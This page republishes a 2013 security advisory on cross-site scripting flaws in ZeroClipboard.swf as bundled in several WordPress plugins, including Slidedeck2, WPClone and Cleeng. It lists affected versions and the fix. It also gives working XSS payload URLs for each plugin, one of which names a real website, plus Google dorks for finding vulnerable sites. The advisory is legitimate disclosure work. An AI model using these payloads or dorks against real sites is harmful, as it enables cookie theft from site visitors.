Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29321
HistoryMay 06, 2013 - 12:00 a.m.

XSS vulnerabilities in ZeroClipboard in multiple plugins for WordPress

2013-05-0600:00:00
vulners.com
24
JSON

Hello 3APA3A!

These are Cross-Site Scripting vulnerabilities in multiple plugins for WordPress (with ZeroClipboard.swf).

Earlier I've wrote about Cross-Site Scripting vulnerabilities in ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote that this is very widespread flash-file and it's placed at tens of thousands of web sites. And it's used in hundreds of web applications.

After publishing this and two other advisories related to ZeroClipboard in February, I've published last month two new advisories (which I prepared in February). About vulnerabilities in WP plugins and in WP themes (with ZeroClipboard.swf).

This flash-file is used potentially in hundreds of plugins for WordPress. Among them are Flash Gallery, Slidedeck2, WPClone, PayPal Digital Goods powered by Cleeng and Cleeng Content Monetization. And there are many other vulnerable plugins for WP with ZeroClipboard.

After February's publications I've made a pause, and meanwhile Henri Salo disclosed in Match multiple vulnerable WordPress plugins with this flash-file (http://seclists.org/oss-sec/2013/q1/613). This list contains many plugins, but this is not exhaustive list and I've found many other vulnerable plugins with ZeroClipboard (including those, which I mentioned bellow).

SecurityVulns ID: 12910
CVE: CVE-2013-1808

Affected products:

Vulnerable are the next web applications (WordPress plugins) with ZeroClipboard (checked in mentioned versions):

Flash Gallery 1.7.2, Slidedeck2 (all Lite, Personal and Pro versions, fixed in version 2.1.20130306), WPClone 2.0.6, PayPal Digital Goods powered by Cleeng 2.2.4, Cleeng Content Monetization 2.3.2.

Both XSS vulnerabilities in ZeroClipboard are fixed in the last version ZeroClipboard 1.1.7. All developers should update swf-file in their software. I wrote about developers who begun fixing these vulnerabilities in ZeroClipboard in their software (http://seclists.org/fulldisclosure/2013/Mar/207).

Details:

Cross-Site Scripting (WASC-08):

XSS via id parameter and XSS via copying payload into buffer (as described in previous advisory).

1 Flash Gallery:

http://site/wp-content/plugins/1-flash-gallery/swf/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Slidedeck2 (all Lite, Personal and Pro versions):

The folder of the plugin can be called slidedeck2, slidedeck-2.0, slidedeck2-personal and slidedeck2-pro. It contains the files ZeroClipboard.swf and ZeroClipboard10.swf.

http://site/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

WPClone:

http://site/wp-content/plugins/wpclone/lib/js/ZeroClipboard.swf?i?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

PayPal Digital Goods powered by Cleeng:

http://site/wp-content/plugins/paypal-digital-goods-monetization-powered-by-cleeng/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Cleeng Content Monetization:

http://www.drchloecarmichael.com/wp-content/plugins/cleeng/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

This is very widespread flash-file (both versions), as you can find out via Google dorks. If at searching by standard Goolge dork it's possible to find tens thousand of sites with ZeroClipboard.swf or ZeroClipboard10.swf, then at searching for plugins for WordPress it's possible to find hundreds thousand of sites with these flash-files.

inurl:zeroclipboard.swf inurl:/wp-content/plugins/ - about 224000 (in February, now more)
zeroclipboard.swf inurl:/wp-content/plugins/ - about 338000 (in February, now more)

Timeline:

2013.02.19 - after contacting with old and new developers of ZeroClipboard, I disclosed vulnerabilities in ZeroClipboard to the lists.
2013.02 - in February I wrote two additional advisories about vulnerabilities in different web applications with ZeroClipboard to draw more attention to this issue concerned with hundreds of web applications.
2013.03.15 - disclosed vulnerabilities in multiple plugins for WordPress at my site (http://websecurity.com.ua/6382/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Related

wpvulndb 24
wpexploit 1
veracode 1
securityvulns 2
patchstack 1
zdt 1
packetstorm 1
prion 3
cve 3
debiancve 2
nessus 2
openvas 2
freebsd 1
wpvulndb
wpvulndb
coupon-code-plugin <= 2.1 - XSS in ZeroClipboard
2014-08-01 10:58:58
geshi-source-colorer <= 0.13 - XSS in ZeroClipboard
2014-08-01 10:58:58
tiny-url <= 1.3.2 - XSS in ZeroClipboard
2014-08-01 10:58:58
wpexploit
wpexploit
slidedeck2 < 2.1.20130313 - XSS in ZeroClipboard
2014-08-01 00:00:00
veracode
veracode
Cross-site Scripting (XSS)
2019-01-15 08:52:23
securityvulns
securityvulns
XSS and FPD vulnerabilities in ZeroClipboard in multiple themes for WordPress
2013-05-06 00:00:00
XSS vulnerabilities in ZeroClipboard and multiple web applications
2013-05-06 00:00:00
patchstack
patchstack
WordPress ZeroClipboard Plugin <= 1.0.7 - XSS
2013-02-19 00:00:00
zdt
zdt
ZeroClipboard Wordpress plugin XSS / FPD Vulnerabilities
2013-04-11 00:00:00
packetstorm
packetstorm
ZeroClipbord.swf Cross Site Scripting / Path Disclosure
2013-04-09 00:00:00
prion
prion
Cross site scripting
2013-04-02 03:23:00
Cross site scripting
2013-02-07 05:56:00
Cross site scripting
2013-04-02 03:22:00
cve
cve
CVE-2012-6550
2013-04-02 03:22:00
CVE-2013-1808
2013-04-02 03:23:00
CVE-2013-1463
2013-02-07 05:56:00
debiancve
debiancve
CVE-2012-6550
2013-04-02 03:22:00
CVE-2013-1808
2013-04-02 03:23:00
nessus
nessus
Jenkins < 1.514 / 1.509.1 and Jenkins Enterprise 1.466.x / 1.480.x < 1.466.14.1 / 1.480.4.1 Multiple Vulnerabilities
2013-06-14 00:00:00
FreeBSD : jenkins -- multiple vulnerabilities (622e14b1-b40c-11e2-8441-00e0814cab4e)
2013-05-04 00:00:00
openvas
openvas
Jenkins CSRF And XSS Vulnerabilities (Windows)
2016-07-14 00:00:00
Jenkins CSRF And XSS Vulnerabilities (Linux)
2016-07-14 00:00:00
freebsd
freebsd
jenkins -- multiple vulnerabilities
2013-05-02 00:00:00
JSON
Related for SECURITYVULNS:DOC:29321
wpvulndb24wpexploit1veracode1securityvulns2patchstack1zdt1packetstorm1prion3cve3debiancve2nessus2openvas2freebsd1